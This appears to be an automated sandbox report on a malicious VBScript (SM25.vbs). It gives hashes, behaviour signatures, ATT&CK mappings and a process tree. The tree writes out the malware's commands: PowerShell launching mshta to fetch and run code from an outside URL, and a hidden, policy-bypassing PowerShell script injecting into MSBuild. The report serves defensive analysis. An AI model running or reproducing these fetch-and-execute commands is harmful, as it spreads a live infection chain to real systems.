Analysis

  • max time kernel
    63s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-04-2021 06:51

General

  • Target

    SM25.vbs

  • Size

    996B

  • MD5

    0bafdab6b8c7bfc2867f8a8ff1437c40

  • SHA1

    eb624db807094865eb14504f323301a0fd2cd95e

  • SHA256

    7a74348cfdcf7d37e88f264c0b9a50b5b9cbec188ca02da0bcca6f054a1b183e

  • SHA512

    9f77c88356140e7433ffcbb2ffd40f013dfa3fb962fdf17afcccc26a274b11eb45c778136d9f1c3054a5f437eb238ab081d19f58482efea550bab410838c5e65

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SM25.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1752
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:1720
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
          3⤵
            PID:3772
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
            3⤵
              PID:768
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1360
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                dw20.exe -x -s 708
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2808
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1732

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Defense Evasion

        Install Root Certificate

        1
        T1130

        Modify Registry

        1
        T1112

        Discovery

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          MD5

          c6b0a774fa56e0169ed7bb7b25c114dd

          SHA1

          bcdba7d4ecfff2180510850e585b44691ea81ba5

          SHA256

          b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

          SHA512

          42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          2143b379fed61ab5450bab1a751798ce

          SHA1

          32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

          SHA256

          a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

          SHA512

          0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

        • C:\Users\Public\Datax.ps1
          MD5

          1528b8b5cf18ecec9301b85857229cee

          SHA1

          33e9a4e6708165c16aa504a78d12e06b5a114732

          SHA256

          2a8bfceffcf3160eac54e71049566c7dfa2dc0651301b4dfe1c0d247d7ba875c

          SHA512

          4f9b247f87ae844418cf3c210e88b9c745a0ae1249221ce6177be40f92cc23e7a64d29bc6666d942203d8fffefd41a6d62a2ad39cd69bf4a14a8228cd1892d7e

        • memory/852-15-0x00000149B0190000-0x00000149B0192000-memory.dmp
          Filesize

          8KB

        • memory/852-10-0x0000000000000000-mapping.dmp
        • memory/852-12-0x00007FFB53CA0000-0x00007FFB5468C000-memory.dmp
          Filesize

          9.9MB

        • memory/852-14-0x00000149C91F0000-0x00000149C91F1000-memory.dmp
          Filesize

          4KB

        • memory/852-16-0x00000149B0193000-0x00000149B0195000-memory.dmp
          Filesize

          8KB

        • memory/1000-8-0x0000000000000000-mapping.dmp
        • memory/1360-42-0x00000000031B0000-0x00000000031B1000-memory.dmp
          Filesize

          4KB

        • memory/1360-32-0x00000000004581DE-mapping.dmp
        • memory/1720-36-0x00000000734F0000-0x0000000073BDE000-memory.dmp
          Filesize

          6.9MB

        • memory/1720-48-0x0000000005410000-0x0000000005411000-memory.dmp
          Filesize

          4KB

        • memory/1720-51-0x00000000054C0000-0x00000000054C1000-memory.dmp
          Filesize

          4KB

        • memory/1720-29-0x0000000000400000-0x000000000045E000-memory.dmp
          Filesize

          376KB

        • memory/1720-30-0x00000000004581DE-mapping.dmp
        • memory/1732-43-0x0000000005470000-0x0000000005471000-memory.dmp
          Filesize

          4KB

        • memory/1732-34-0x00000000004581DE-mapping.dmp
        • memory/1732-58-0x0000000006480000-0x0000000006481000-memory.dmp
          Filesize

          4KB

        • memory/1732-57-0x0000000006110000-0x0000000006111000-memory.dmp
          Filesize

          4KB

        • memory/1732-56-0x0000000005D20000-0x0000000005D21000-memory.dmp
          Filesize

          4KB

        • memory/1732-54-0x00000000051B0000-0x00000000051B1000-memory.dmp
          Filesize

          4KB

        • memory/1732-52-0x0000000004F20000-0x0000000004F21000-memory.dmp
          Filesize

          4KB

        • memory/1732-35-0x00000000734F0000-0x0000000073BDE000-memory.dmp
          Filesize

          6.9MB

        • memory/1752-4-0x000001E5AA900000-0x000001E5AA901000-memory.dmp
          Filesize

          4KB

        • memory/1752-5-0x000001E5C4FE0000-0x000001E5C4FE1000-memory.dmp
          Filesize

          4KB

        • memory/1752-3-0x00007FFB560F0000-0x00007FFB56ADC000-memory.dmp
          Filesize

          9.9MB

        • memory/1752-7-0x000001E5AA8C3000-0x000001E5AA8C5000-memory.dmp
          Filesize

          8KB

        • memory/1752-9-0x000001E5AA8C6000-0x000001E5AA8C8000-memory.dmp
          Filesize

          8KB

        • memory/1752-6-0x000001E5AA8C0000-0x000001E5AA8C2000-memory.dmp
          Filesize

          8KB

        • memory/1752-2-0x0000000000000000-mapping.dmp
        • memory/2808-45-0x0000000002740000-0x0000000002741000-memory.dmp
          Filesize

          4KB

        • memory/2808-46-0x00000000029D0000-0x00000000029D1000-memory.dmp
          Filesize

          4KB

        • memory/2808-37-0x0000000000000000-mapping.dmp
        • memory/2808-47-0x00000000029D0000-0x00000000029D1000-memory.dmp
          Filesize

          4KB

        • memory/3760-23-0x0000028255163000-0x0000028255165000-memory.dmp
          Filesize

          8KB

        • memory/3760-19-0x00007FFB53CA0000-0x00007FFB5468C000-memory.dmp
          Filesize

          9.9MB

        • memory/3760-18-0x0000000000000000-mapping.dmp
        • memory/3760-28-0x0000028256C80000-0x0000028256C88000-memory.dmp
          Filesize

          32KB

        • memory/3760-27-0x0000028256C70000-0x0000028256C7A000-memory.dmp
          Filesize

          40KB

        • memory/3760-26-0x0000028255166000-0x0000028255168000-memory.dmp
          Filesize

          8KB

        • memory/3760-21-0x0000028255160000-0x0000028255162000-memory.dmp
          Filesize

          8KB